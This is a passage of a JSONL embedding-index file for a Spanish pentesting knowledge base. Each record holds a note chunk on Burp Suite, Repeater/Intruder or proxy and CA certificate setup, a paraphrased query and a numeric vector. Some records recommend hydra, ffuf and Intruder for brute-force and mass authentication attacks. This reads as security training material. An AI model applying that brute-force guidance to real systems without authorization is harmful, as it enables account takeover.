usa **hydra**; para fuzzing de rutas/params usa **ffuf** β†’ Content discovery.", "indexar": "con quΓ© puedo realizar un ataque de cluster bomb o fuerza bruta exhaustiva?", "v": [-0.0342, -0.05011, -0.24813, -0.09566, -0.15815, 0.04708, 0.0211, 0.0861, -0.09062, -0.13636, -0.12341, -0.05635, -0.07539, 0.22335, -0.00905, -0.18174, -0.08566, -0.07824, -0.09136, -0.12211, 0.05624, -0.14615, 0.10378, 0.01135, -0.10051, 0.03814, -0.15658, 0.19544, -0.07182, -0.1441, -0.04443, -0.0038, 0.16305, 0.00354, 0.06279, 0.04042, -0.03409, 0.05641, 0.04834, 0.02678, -0.09038, 0.07792, -0.19053, -0.01813, 0.02829, 0.01476, 0.00485, -0.0385, 0.0596, -0.08219, -0.08603, 0.0231, -0.1586, -0.11247, -0.05051, -0.10515, -0.02905, -0.09033, -0.03324, 0.00876, -0.1291, 0.09412, -0.04783, -0.04785, -0.03082, 0.06234, -0.07932, 0.04696, -0.03186, -0.06155, -0.07345, -0.07238, -0.00273, 0.04365, 0.01799, -0.0039, 0.01533, 0.05698, 0.01978, 0.04286, -0.02934, 0.02492, -0.06096, -0.05382, -0.03032, -0.00706, 0.02065, -0.01536, -0.10152, -0.00826, 0.01572, -0.04116, -0.04235, 0.04518, -0.06158, -0.0832, 0.01429, -0.03636, -0.01814, -0.07578, 0.02968, 0.00351, -0.07127, 0.0636, 0.12409, 0.01453, -0.11263, 0.03576, -0.00047, -0.05572, -0.05948, -0.06571, -0.05296, -0.05491, -0.01635, -0.05743, -0.08238, -0.00641, -0.04344, -0.00479, -0.04798, 0.01774, 0.03727, 0.04031, -0.06151, 0.02975, 0.00852, -0.0294, -0.04538, -0.02078, -0.02114, 0.06357, 0.09308, -0.02107, 0.02397, 0.04032, 0.0973, -0.13277, 0.02227, -0.03307, 0.00414, 0.01522, 0.0701, -0.01928, 0.01197, -0.0026, -0.04542, -0.03237, -0.04514, -0.00264, 0.05215, -0.01866, 0.05839, 0.01172, 0.00856, -0.06399, 0.03344, -0.02189, 0.03616, 0.01399, -0.00527, -0.00562, -0.07795, 0.0396, -0.00821, 0.03521, -0.01777, -0.07871, 0.00136, 0.05836, -0.02415, -0.07218, 0.04849, 0.07253, 0.06441, -0.07115, -0.03709, 0.00836, -0.01695, 0.03706, -0.05871, -0.03591, -0.05385, 0.04374, 0.0378, -0.00556, 0.02079, 0.01585, 0.0386, 0.05888, 0.02593, 0.01332, -0.00465, -0.00458, -0.00922, -0.05267, -0.03307, -0.01884, -0.00861, -0.00071, 0.00381, -0.03569, -0.02967, -0.04491, -0.00926, 0.07551, -0.05089, -0.05021, 0.00339, 0.02994, 0.04702, -0.02604, 0.05185, -0.05335, -0.06848, 0.00353, -0.00049, 0.03847, 0.01145, 0.02353, -0.01208, 0.08128, 0.03189, 0.01121, -0.01953, -0.02051, 0.00755, -0.02823, 0.05907, 0.03975, -0.02773, -0.03256, 0.07537, 0.00449, -0.00666, 0.00835, 0.02713, 0.01285, -0.11395, 0.05587, 0.00228, 0.00331, 0.00342, -0.00708, -0.04365, 0.00572, -0.04039, -0.00597, 0.00199, -0.02924, -0.04812, 0.03035, 0.02954, -0.00812, 0.02884, 0.01361]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo cada uno\n- ΒΏUna peticiΓ³n, muchas variantes a ojo? β†’ **Repeater**.\n- ΒΏMisma peticiΓ³n, cientos de payloads? β†’ **Intruder** (o ffuf/hydra si Community se queda corto).\n\nRelacionado: Burp Suite Β· Authentication attacks Β· OSCP MOC", "indexar": "ΒΏHay un programa para probar diferentes variantes de una peticiΓ³n HTTP?", "v": [-0.0594, 0.09557, -0.11999, -0.11869, -0.03118, -0.05222, 0.02918, -0.069, 0.1319, -0.03122, 0.00868, -0.01517, 0.02698, -0.03574, -0.02118, 0.01119, 0.06638, -0.16396, 0.14333, -0.04704, -0.00592, -0.00233, -0.13112, -0.06554, -0.11642, -0.07291, 0.03422, 0.09612, -0.09099, -0.09009, 0.01987, -0.06189, -0.06004, 0.11659, -0.16295, 0.04942, 0.0037, -0.02081, 0.07945, 0.08215, 0.03151, -0.04595, 0.05639, -0.02146, -0.09294, 0.04673, -0.06533, -0.05126, 0.03344, -0.12696, 0.04308, -0.01272, -0.20134, 0.06075, -0.01411, 0.07551, 0.04095, -0.19181, -0.10587, -0.09727, 0.02222, -0.07604, 0.09199, -0.00272, 0.07747, -0.07745, -0.03269, 0.06778, -0.11251, 0.11501, -0.11588, -0.00193, 0.04037, -0.0406, 0.02717, 0.04313, -0.04034, -0.10449, -0.0321, 0.01434, 0.04295, 0.08006, -0.00205, 0.09622, -0.13064, -0.01032, -0.05259, -0.03819, 0.09557, 0.00408, 0.12161, 0.12132, -0.0039, 0.05675, -0.00476, -0.13816, 0.15119, -0.01589, 0.03547, -0.02372, -0.01253, -0.01747, -0.08763, 0.11136, -0.07047, 0.1487, 0.03767, -0.00259, -0.01794, 0.03797, -0.03328, -0.02097, -0.09527, 0.08128, 0.01762, -0.0026, -0.01408, 0.01181, 0.01325, -0.11445, -0.07519, 0.03588, -0.09153, -0.01126, 0.07061, 0.02196, -0.01064, 0.07074, -0.04639, 0.0411, 0.01772, -0.01677, -0.04464, 0.00544, -0.0653, 0.02979, 0.10548, -0.06895, -0.01056, 0.0226, -0.04658, 0.05171, 0.03747, -0.0176, 0.05437, 0.00109, 0.00417, -0.0479, -0.03089, 0.04281, -0.03706, -0.0099, -0.06187, 0.02775, -0.1059, -0.02359, -0.01841, -0.09132, -0.0892, 0.12372, -0.04274, 0.05501, -0.00258, -0.02835, 0.01704, 0.0324, -0.09745, 0.01261, 0.0494, 0.01065, -0.00806, 0.09352, -0.02577, -0.08063, -0.02488, 0.00106, -0.06952, -0.04875, 0.00901, -0.04008, -0.06479, 0.00968, 0.03947, 0.02622, 0.06216, -0.04218, 0.02336, 0.07557, -0.00325, -0.01018, 0.02703, 0.06346, -0.10412, 0.05262, 0.03768, 0.03627, 0.00667, -0.00774, 0.0374, 0.02069, -0.1039, -0.04935, 0.04517, -0.06383, 0.00659, 0.05111, -0.01048, -0.00617, -0.00788, 0.00423, 0.06193, -0.02629, 0.0764, 0.01769, 0.0168, -0.02799, 0.01647, 0.0537, 0.04805, 0.01341, -0.04392, -0.00277, 0.00672, 0.07955, -0.00958, -0.01118, 0.05004, -0.01127, 0.00523, 0.00631, 0.01048, 0.00807, -0.01588, -0.018, 0.03798, 0.03184, -0.0268, 0.01797, -0.01932, -0.09076, -0.01176, 0.02731, -0.00614, -0.00335, 0.01123, -0.02075, -0.07713, -0.0137, 0.01488, 0.06145, -0.07776, 0.0116, -0.00068, -0.05522, -0.01031, 0.04928]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo cada uno\n- ΒΏUna peticiΓ³n, muchas variantes a ojo? β†’ **Repeater**.\n- ΒΏMisma peticiΓ³n, cientos de payloads? β†’ **Intruder** (o ffuf/hydra si Community se queda corto).\n\nRelacionado: Burp Suite Β· Authentication attacks Β· OSCP MOC", "indexar": "ΒΏQuΓ© herramienta me sirve para lanzar cientos de payloads a la vez?", "v": [0.00414, 0.11699, -0.16177, -0.05448, 0.00066, -0.1064, -0.00793, -0.06077, -0.01648, -0.01954, -0.10078, -0.03272, 0.0061, -0.00687, -0.02396, 0.11135, -0.05504, 0.03881, -0.04024, -0.00979, 0.00262, 0.01393, -0.129, -0.08134, -0.05216, 0.07598, 0.11135, -0.1164, -0.34101, 0.06053, -0.09845, 0.0956, 0.01659, -0.03683, -0.01028, -0.0273, 0.00505, 0.1407, -0.00547, 0.08537, 0.04627, 0.09053, -0.09251, 0.0254, 0.06783, 0.04491, 9e-05, 0.0426, 0.06387, 0.03261, -0.00294, -0.07128, -0.08268, 0.10801, -0.03865, -0.10515, 0.17294, -0.10776, 0.00374, -0.07018, -0.10145, 0.05513, -0.02621, -0.07952, -0.06793, -0.09728, -0.04477, -0.05714, -0.07226, -0.04612, 0.04188, -0.00193, 0.07608, 0.06627, -0.01234, 0.0093, 0.03109, 0.05984, 0.07097, 0.08588, 0.08396, -0.04293, -0.08748, 0.01107, 0.00696, -0.06146, 0.08499, 0.06067, 0.06184, -0.1429, -0.03786, 0.07717, -0.10403, 0.0691, -0.05222, 0.01206, 0.08341, -0.04787, -0.00746, -0.02851, 0.13168, -0.02511, 0.01098, -0.00627, 0.02195, 0.03818, -0.01278, -0.11708, -0.04681, -0.03211, 0.10697, -0.06002, -0.01255, 0.03716, -0.0891, 0.00235, -0.034, 0.02307, -0.01711, -0.04781, -0.01822, 0.07586, 0.00328, -0.01071, 0.03935, -0.03886, -0.09038, 0.11638, 0.02169, 0.00129, 0.02771, 0.01331, -0.01403, 0.06748, -0.00741, -0.0653, 0.1513, -0.12001, -0.00943, -0.01045, 0.09266, 0.08824, 0.01836, -0.0654, 0.02273, 0.06125, 0.04135, -0.05019, -0.06734, -0.04932, 0.04208, -0.00818, -0.02902, 0.0244, -0.04372, -0.0654, 0.05607, 0.02097, -0.0799, -0.01189, -0.01599, -0.00069, 0.0178, -0.02551, 0.00333, -0.03947, -0.00918, -0.0289, 0.01866, 0.12427, 0.04903, -0.00484, 0.04921, -0.00506, 0.01582, -0.07483, -0.09128, 0.01908, 0.04102, -0.04095, -0.10532, 0.01754, -0.03389, 0.04117, 0.06338, -0.07155, 0.00409, -0.01064, 0.05197, 0.0727, 0.0238, 0.02956, 0.02338, -0.14043, 0.00822, -0.02305, -0.03041, -0.04834, 0.04499, 0.01983, 0.02535, -0.03844, -0.04136, -0.03822, 0.01034, 0.08056, -0.01943, 0.00063, 0.02181, -0.00641, 0.0645, -0.0195, 0.11108, -0.01665, -0.05107, -0.03675, -0.01234, 0.00851, 0.01427, 0.03444, 0.00814, 0.00974, 0.049, -0.03191, -0.00913, 0.09865, 0.0815, -0.01645, 0.06487, -0.00499, 0.02629, 0.02035, -0.02386, -0.01118, 0.03539, -0.04645, 0.02232, -0.03053, -0.10318, -0.02501, 0.00358, 0.02001, -0.03221, -0.0585, -0.05217, -0.03748, -0.01115, 0.00323, -0.04901, -0.04417, -0.03789, 0.0494, 0.03587, -0.01554, 0.03827, -0.00682]} +{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo cada uno\n- ΒΏUna peticiΓ³n, muchas variantes a ojo? β†’ **Repeater**.\n- ΒΏMisma peticiΓ³n, cientos de payloads? β†’ **Intruder** (o ffuf/hydra si Community se queda corto).\n\nRelacionado: Burp Suite Β· Authentication attacks Β· OSCP MOC", "indexar": "ΒΏCon quΓ© puedo realizar ataques de autenticaciΓ³n masivos?", "v": [-0.02182, 0.13524, -0.14773, 0.15787, 0.0473, 0.03738, 0.07119, 0.00543, -0.18281, 0.06279, 0.02113, -0.03624, 0.02922, 0.06887, 0.09989, 0.04367, 0.15976, 0.03565, 0.06622, 0.00346, 0.08675, -0.20561, -3e-05, 0.01241, -0.01388, -0.02431, 0.00042, 0.09641, -0.08652, -0.08486, 0.02401, 0.06926, -0.0191, 0.03268, 0.0707, 0.04964, -0.01919, 0.19909, 0.08799, 0.00018, 0.0683, -0.02609, -0.20109, -0.13107, 0.08695, -0.0524, 0.00315, -0.03394, -0.01764, -0.01922, -0.01009, 0.03053, -0.1822, -0.05272, -0.13668, -0.08656, 0.0681, -0.05918, 0.12419, -0.03327, -0.07127, 0.05265, 0.04791, -0.00766, 0.08181, -0.09623, 0.00955, -0.06352, 0.00148, 0.07735, -0.04335, -2e-05, 0.00637, 0.11263, 0.0598, 0.01091, 0.00249, 1e-05, 0.02095, 0.0099, -0.00128, 0.03715, 0.01039, -0.04776, -0.10373, 0.02071, -0.04152, -0.10372, -0.05599, -0.10759, 0.04984, -0.02301, 0.0025, -0.06136, -0.03353, -0.01469, -0.09235, -0.07059, -0.01714, -0.02909, -0.08369, -0.05318, -0.06239, 0.04608, 0.00161, 0.0633, -0.07978, -0.03087, 0.00155, -0.09901, -0.07076, -0.06448, -0.10546, -0.05447, 0.00941, -0.01075, -0.11962, 0.01785, 0.08307, -0.02142, -0.11166, 0.01207, 0.04838, 0.0427, 0.0385, 0.08403, 0.01433, 0.05297, -0.07702, -0.08378, 0.01627, 0.02161, 0.04415, -0.00675, -0.03084, 0.00404, 0.01184, -0.16125, 0.02429, -0.006, 0.05349, 0.05489, 0.01653, -0.01229, 0.01912, 0.03466, -0.08759, -0.08169, -0.14538, 0.00251, 0.04781, 0.02769, 0.02373, 0.07713, -0.05923, -0.03688, -0.01066, -0.08005, -0.03108, 0.12722, -0.0371, 0.03059, -0.05159, 0.04171, -0.06605, -0.01891, 0.00735, -0.00443, 0.02314, 0.09217, 0.01251, 0.07051, 0.02229, -0.07163, 0.05771, 0.02556, -0.02195, -0.08458, 0.00072, -0.05219, -0.04226, -0.08548, -0.03657, 0.00701, 0.04954, 0.01981, 0.03486, 0.00615, 0.05841, 0.08021, 0.03131, 0.00942, 0.00886, 0.00853, 0.04544, -0.05801, -0.02416, -0.04942, -0.00675, 0.00906, -0.024, -0.0494, -0.0281, -0.03208, 0.0826, 0.07305, -0.0529, -0.02927, -0.05793, 0.02436, 0.01802, -0.01473, 0.10821, -0.07661, -0.05671, 0.01689, 0.03121, 0.01465, -0.01024, 0.01333, 0.01024, 0.01431, 0.02866, 0.04036, 0.0296, 0.02767, 0.00359, -0.07178, 0.05125, 0.04754, 0.04062, -0.03455, -0.03498, -0.04317, 0.07122, -0.00402, 0.02968, 0.0254, -0.05758, 0.02948, 0.01808, 0.0122, 0.00194, -0.04305, -0.018, -0.02855, -0.10964, 0.01943, -0.02074, -0.053, -0.04468, 0.01768, 0.01087, 0.02199, 0.03193, -0.02855]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Suite\n\n> El proxy de interceptaciΓ³n: se pone **entre tu navegador y la web** para ver y **modificar** cada peticiΓ³n. La herramienta nΒΊ1 del Hacking web. Instalado en `tu carpeta`.", "indexar": "que programa me sirve para interceptar y modificar las peticiones que hago desde mi navegador?", "v": [0.11801, 0.15137, -0.1781, -0.19029, 0.08255, -0.07663, -0.01833, 0.06588, -0.12317, -0.09253, 0.0593, 0.00163, 0.05019, -0.17053, 0.04964, 0.06249, 0.06578, -0.00958, 0.13396, 0.04855, 0.05172, 0.05339, 0.12981, -0.06499, -0.15329, -0.03216, -0.03749, -0.02487, -0.05048, -0.10882, -0.07577, -0.10485, -0.02799, 0.05672, -0.10112, -0.0291, 0.05355, -0.04, 0.02199, 0.01048, 0.05148, -0.05366, -0.08843, -0.00305, 0.08061, -0.02194, 0.01062, 0.01249, -0.05321, -0.03698, 0.05576, -0.01121, -0.12928, 0.05843, -0.0755, 0.05551, 0.10712, -0.19622, 0.01777, -0.06404, -0.04429, -0.02127, 0.07089, 0.00581, 0.07094, -0.04276, -0.05142, -0.0225, -0.04664, 0.03938, -0.03099, -0.02246, 0.0193, -0.00631, 0.10447, 0.05289, 0.01197, -0.08543, 0.07691, -0.02053, -0.04706, 0.00633, -0.10204, 0.09386, -0.02274, 0.03826, 0.02123, -0.12927, -0.00796, -0.01, 0.07629, 0.19106, -0.00557, 0.0285, 0.03169, -0.09369, 0.05334, 0.07631, 0.04205, 0.02741, 0.08009, -0.03846, -0.07171, 0.03871, 0.0376, 0.00454, 0.01867, -0.07034, 0.00685, 0.09829, -0.05268, -0.00305, -0.05286, -0.04859, 0.00022, 0.01038, -0.08901, -0.04065, -0.02316, -0.10867, -0.11295, 0.00944, -0.13645, -0.03699, 0.07494, -0.01003, -0.06482, 0.07561, 0.03193, 0.01445, -0.01891, -0.02492, -0.01847, -0.0471, -0.02066, -0.06495, -0.0586, -0.06119, 0.06041, -0.01366, 0.02712, 0.05407, 0.06529, 0.02937, 0.01557, -0.01722, 0.00908, -0.03725, -0.05195, -0.07203, 0.0158, -0.07836, -0.03007, -0.01874, -0.08859, 0.08135, 0.04015, -0.07845, -0.0379, 0.07583, -0.05134, 0.0074, 0.00136, -0.05356, 0.07973, -0.13815, -0.08186, 0.02007, 0.14275, 0.02169, -0.05354, 0.01822, -0.01987, -0.10691, 0.00036, -0.03181, -0.01987, -0.01045, 0.03511, -0.01868, -0.06543, 0.08738, 0.02479, 0.06687, -0.03682, -0.068, 0.00019, 0.06027, 0.01873, 0.01061, 0.04353, 0.07064, -0.0044, -0.031, 0.01956, 0.0314, -0.05263, 0.02382, 0.08667, -0.01692, 0.0085, -0.06161, 0.00498, -0.05635, -0.00678, 0.01523, -0.00587, -0.07142, 0.06476, 0.08593, -0.00522, 0.01832, 0.06892, 0.01259, 0.00945, -0.04684, 0.05912, 0.0712, 0.01022, -0.00659, 0.00765, 0.00295, 0.04058, 0.03169, -0.02428, -0.02241, 0.03008, 0.02808, 0.01212, 0.05888, -0.00195, -0.0528, -0.07826, -0.03635, 0.00941, -0.00892, -0.02271, -0.04288, -0.02917, -0.09922, 0.02233, 0.05906, 0.00791, -0.05331, -0.00029, -0.03601, -0.06368, 0.01674, 0.0587, -0.00287, -0.07321, 0.0544, 0.06726, -0.05902, 0.03686, 0.00131]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Suite\n\n> El proxy de interceptaciΓ³n: se pone **entre tu navegador y la web** para ver y **modificar** cada peticiΓ³n. La herramienta nΒΊ1 del Hacking web. Instalado en `tu carpeta`.", "indexar": "con quΓ© puedo ponerme entre mi navegador y la web para ver y cambiar los datos enviados?", "v": [-0.0266, 0.174, -0.16012, -0.08577, -0.05786, 0.06347, 0.03006, -0.03287, -0.08667, -0.18331, -0.04731, -0.17536, 0.022, -0.1107, -0.04272, 0.05717, 0.09587, -0.01329, 0.12309, -0.03828, 0.0143, -0.09561, 0.03943, -0.07409, -0.09657, 0.00395, 0.02192, 0.04566, -0.09774, -0.00098, -0.08567, -0.08051, -0.01499, 0.12478, -0.00104, 0.10727, 0.1465, 0.07669, 0.08497, -0.08571, 0.05377, -0.06461, -0.03102, 0.10362, -0.05933, -0.00613, -0.05869, -0.03332, 0.02378, -0.094, -0.04478, 0.07137, -0.11594, -0.00719, -0.07508, 0.0477, 0.19018, -0.09234, 0.09277, -0.00606, -0.00986, 0.06131, -0.02343, 0.09612, 0.04688, -0.05148, -0.03827, 0.02133, -0.07408, 0.11734, 0.06043, -0.03832, -0.05623, -0.02046, 0.0382, 0.04168, 0.06638, 0.01352, 0.0017, 0.04096, 0.03295, 0.06516, -0.12178, 0.0414, 0.04657, -0.0078, -0.03647, -0.07979, 0.01909, -0.07919, 0.14013, 0.08396, -0.00607, -0.00427, -0.03497, -0.00264, -0.02959, -0.07102, -0.01616, -0.05995, -0.01432, 0.05861, -0.07786, 0.15811, 0.02221, 0.01077, 0.06364, -0.02413, -0.06359, 0.03533, -0.0033, -0.00786, -0.04168, -0.05946, 0.03451, -0.02098, -0.00373, -0.00445, -0.09902, -0.05914, -0.08382, -0.02921, -0.05854, 0.02648, -0.02299, 0.05511, -0.0076, 0.04198, -0.02372, 0.10082, -0.0647, -0.09092, -0.06112, -0.05491, 0.02619, 0.06202, -0.05735, -0.06187, 0.06129, 0.03712, 0.01468, -0.01867, -0.08998, 0.06455, 0.06426, -0.08669, -0.02431, 0.03337, -0.15397, -0.12915, -0.02766, -0.0169, 0.05152, 0.00719, -0.10097, 0.07913, 0.00321, -0.06843, 0.01924, -0.01769, -0.0498, 0.03232, 0.06093, 0.01883, 0.00842, -0.03964, -0.06163, 0.04609, 0.0873, 0.03505, -0.0398, 0.08233, 0.02346, -0.10568, 0.0653, 0.01692, -0.08667, -0.01803, -0.01176, -0.01733, 0.10639, -0.01972, 0.00788, 0.06904, -0.02522, -0.05642, 0.02069, -0.03047, -0.11392, -0.00951, 0.00807, 0.07861, 0.01431, -0.01041, 0.09065, -0.0219, -0.04215, -0.02541, 0.01083, -0.02542, 4e-05, -0.04554, 0.02819, -0.00755, -0.03159, 0.04921, 0.00758, -0.08037, 0.05634, -0.02967, -0.00662, -0.06796, 0.066, -0.03607, -0.05602, -0.02735, 0.09, 0.02232, -0.01442, -0.01169, 0.01148, 0.00792, -0.0082, -0.07065, -0.01402, 0.01358, 0.0705, -0.04573, -0.047, -0.01078, -0.02344, -0.01568, -0.01712, -0.03372, 0.06143, 0.03021, -0.03338, -0.05074, -0.04121, -0.00315, -0.01682, 0.0447, 0.01346, -0.04199, 0.03321, -0.01341, -0.11562, 0.0126, -0.01494, -0.01557, -0.08184, -0.05842, 0.0151, -0.06059, -0.04069, 0.03472]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Montar el proxy (lo primero)\n1. Navegador β†’ proxy `127.0.0.1:8080` (usa **FoxyProxy** para alternar rΓ‘pido).\n2. Instala el certificado CA de Burp: visita `http://burp` β†’ *CA Certificate* β†’ impΓ³rtalo en el navegador (sin esto, HTTPS da error).\n3. O usa el **navegador embebido** de Burp (Proxy β†’ Open Browser), ya viene configurado.", "indexar": "con quΓ© puedo configurar un proxy local para mi navegador", "v": [0.02037, 0.13019, -0.21256, -0.12897, 0.03307, -0.02922, 0.08391, 0.03942, -0.08773, -0.13708, -0.03256, 0.00555, 0.02235, -0.12491, -0.06867, -0.00137, 0.06782, -0.03875, 0.08251, 0.08471, -0.06209, -0.06312, -0.02964, 0.02189, 0.11485, -0.02864, 0.07442, -0.01888, -0.06432, -0.17441, -0.1058, -0.02502, 0.03275, 0.06349, -0.0318, 0.06394, 0.11935, 0.07154, 0.03309, -0.08187, 0.09613, -0.15724, -0.01689, 0.10715, 0.03301, 0.00054, -0.04943, -0.16242, -0.01593, -0.10912, -0.04534, -0.1175, -0.14438, 0.09735, -0.02148, 0.07418, 0.06101, -0.236, 0.03965, -0.05431, -0.02268, -0.07929, -0.00874, 0.03924, 0.04491, -0.00845, -0.04807, 0.04304, -0.06179, 0.00867, 0.00871, -0.03912, -0.00325, -0.05674, 0.06368, 0.07699, 0.01693, -0.0072, 0.21481, 0.07011, 0.10382, 0.08486, -0.07552, -0.02388, -0.08427, -0.03632, -0.08553, -0.07635, 0.12761, -0.04575, 0.08676, 0.02796, -0.0143, -0.00521, -0.00987, -0.07177, 0.082, 0.0304, -0.04622, -0.02586, 0.03877, -0.01763, -0.08044, 0.18394, 0.0499, -0.03903, 0.01268, -0.01848, 0.04447, 0.00031, 0.07625, 0.00802, -0.054, -0.05138, 0.05413, -0.02787, -0.03431, 0.06001, 0.00579, -0.03793, -0.04599, -0.02281, -0.11598, 0.01099, -0.0154, 0.08346, -0.03206, 0.05969, -0.00442, 0.07052, 0.02669, -0.14366, 0.03601, -0.07451, -0.05922, 0.08236, 0.02481, -0.09862, -0.0317, -0.03992, 0.00879, -0.0652, -0.03851, 0.03336, 0.0748, -0.00814, -0.05157, 0.04828, -0.05966, -0.09684, -0.02353, -0.04008, 0.01741, -0.0025, -0.07361, 0.06732, 0.02454, -0.02643, 0.06182, 0.02147, -0.0263, -0.00315, 0.03822, 0.03678, -0.01828, -0.03559, -0.09156, -0.02509, 0.12155, 0.04755, -0.0371, 0.04972, 0.01103, -0.11927, 0.0061, 0.00216, -0.00839, -0.017, 0.01848, 0.01826, 0.08188, 0.00104, 0.02674, 0.02159, -0.0608, -0.03252, -0.00178, -0.00417, -0.06207, 0.05974, -0.05137, 0.03127, -0.03081, -0.00212, 0.08034, -0.03935, -0.03955, -0.05423, -0.05563, -0.01574, -0.00183, -0.04046, 0.00471, 0.00015, 0.02229, 0.02252, 0.00679, -0.03426, 0.04212, 0.0296, 0.00361, -0.0335, 0.04532, 0.04086, 0.00325, 0.01388, 0.06342, -0.03619, -0.02222, 0.00152, -0.00431, 0.00635, 0.02608, -0.00242, 0.01472, 0.00738, 0.04018, -0.04422, 0.00445, 0.05178, -0.0183, 0.00545, -0.06737, -0.00277, 3e-05, -0.01069, 0.01337, 0.00987, -0.00413, 0.03403, -0.00811, 0.05728, 0.02206, -0.05743, -0.05571, -0.03421, -0.07431, 0.00563, 0.01857, -0.01584, -0.04839, 0.02014, 0.02845, -0.02742, -0.01947, 0.06725]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Montar el proxy (lo primero)\n1. Navegador β†’ proxy `127.0.0.1:8080` (usa **FoxyProxy** para alternar rΓ‘pido).\n2. Instala el certificado CA de Burp: visita `http://burp` β†’ *CA Certificate* β†’ impΓ³rtalo en el navegador (sin esto, HTTPS da error).\n3. O usa el **navegador embebido** de Burp (Proxy β†’ Open Browser), ya viene configurado.", "indexar": "quΓ© programa sirve para instalar certificados CA automΓ‘ticamente en el navegador", "v": [0.1096, 0.05328, -0.13688, -0.20114, 0.09716, -0.22043, 0.1056, -0.05458, -0.13429, -0.11054, -0.12256, -0.10975, -0.12033, -0.09963, 0.02903, 0.06367, 0.11847, -0.14835, 0.09714, 0.04251, 0.01457, -0.07154, -0.01445, -0.08273, 0.00052, 0.10652, -0.02042, -0.01389, -0.12151, -0.05951, 0.0938, 0.05646, 0.07653, 0.00347, -0.04244, 0.02591, 0.01588, -0.05707, -0.02847, -0.00257, 0.07105, 0.04954, 0.028, 0.07451, 0.01745, -0.03722, 0.07544, -0.06391, 0.02983, -0.11871, 0.01393, -0.03488, -0.03471, -0.02937, -0.03791, 0.00084, 0.05627, -0.0914, 0.01194, -0.06189, -0.06217, 0.04959, -0.00661, 0.09672, 0.04614, 0.04083, 0.07794, 0.05142, -0.03724, -0.00367, -0.02411, 0.00109, 0.06435, -0.01011, -0.05749, 0.10926, -0.04817, -0.03326, 0.14322, -0.02504, 0.10682, -0.00981, 0.06048, -0.03796, -0.07781, -0.02172, -0.01512, -0.0208, 0.06824, -0.066, 0.02024, 0.0713, 0.05991, 0.08273, 0.09229, -0.109, 0.16872, -0.05238, 0.05265, 0.04433, -0.01607, -0.03834, 0.00449, 0.1402, -0.06307, -0.0068, 0.0631, -0.07619, -0.0368, 0.03696, 0.02524, 0.03845, -0.13497, -0.07622, 0.01693, 0.05728, 0.03196, -0.0697, -0.03324, -0.01929, -0.12442, -0.00243, -0.10626, 0.06023, 0.04848, 0.03101, -0.036, 0.0865, -0.01428, 0.0476, 0.03721, -0.11108, -0.02873, 0.03095, -0.11192, -0.04497, -0.03715, -0.07613, -0.05669, -0.004, 0.03624, 0.04402, 0.04471, 0.00158, 0.08538, 0.0021, -0.06441, -0.02902, 0.00878, -0.05077, -0.02836, 0.02677, 0.02693, 0.05262, -0.09578, -0.05594, -0.00145, -0.05037, 0.00204, 0.10582, 0.0077, -0.02005, 0.02448, 0.02759, 0.03496, 0.02173, -0.0658, 0.02046, 0.11195, 0.11613, -0.00275, 0.06823, 0.03845, -0.08763, 0.00556, 0.01696, 0.04481, -0.02806, 0.06254, 0.01751, -0.05893, 0.02185, 0.06909, 0.00973, -0.02548, -0.07866, -0.02603, -0.017, 0.01354, 0.03083, -0.00485, -0.00198, -0.09294, -0.02168, 0.02151, -0.01543, -0.0573, -0.06195, 0.00112, -0.05703, -0.02126, 0.03038, 0.01969, 0.00191, 0.10505, 0.07094, 0.03855, -0.0254, 0.05466, 0.10693, -0.06562, -0.02287, 0.06023, 0.00328, -0.02617, -0.01073, -0.02703, 0.01054, 0.02563, 0.03271, -0.00498, -0.08872, 0.0168, 0.04567, 0.0366, -0.02682, 0.05658, 0.02681, 0.02903, 0.04982, -0.02394, -0.00548, -0.06366, -0.00341, 0.08316, -0.01434, 0.01076, -0.02268, -0.03046, -0.06984, -0.03195, 0.05437, 0.0081, -0.08258, -0.02565, -0.01826, 0.00245, -0.02826, 0.02472, -0.03074, -0.0653, 0.0586, 0.01897, -0.02539, -0.00914, 0.0212]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Montar el proxy (lo primero)\n1. Navegador β†’ proxy `127.0.0.1:8080` (usa **FoxyProxy** para alternar rΓ‘pido).\n2. Instala el certificado CA de Burp: visita `http://burp` β†’ *CA Certificate* β†’ impΓ³rtalo en el navegador (sin esto, HTTPS da error).\n3. O usa el **navegador embebido** de Burp (Proxy β†’ Open Browser), ya viene configurado.", "indexar": "hay alguna alternativa libre a FoxyProxy para alternar rΓ‘pidamente entre servidores", "v": [-0.13871, -0.01974, -0.18867, -0.00365, -0.13109, -0.0203, -0.01467, -0.12052, -0.07852, -0.08752, -0.01185, -0.12468, 0.01035, 0.02458, 0.12221, 0.00577, -0.00468, -0.03698, 0.03196, 0.04652, 0.00436, 0.05985, -0.13903, -0.14966, 0.05283, -0.02546, -0.04066, -0.08935, 0.00017, -0.10084, 0.12066, -0.02568, 0.11995, 0.04486, -0.04224, 0.06582, 0.03272, 0.09599, 0.13462, -0.0214, 0.05903, 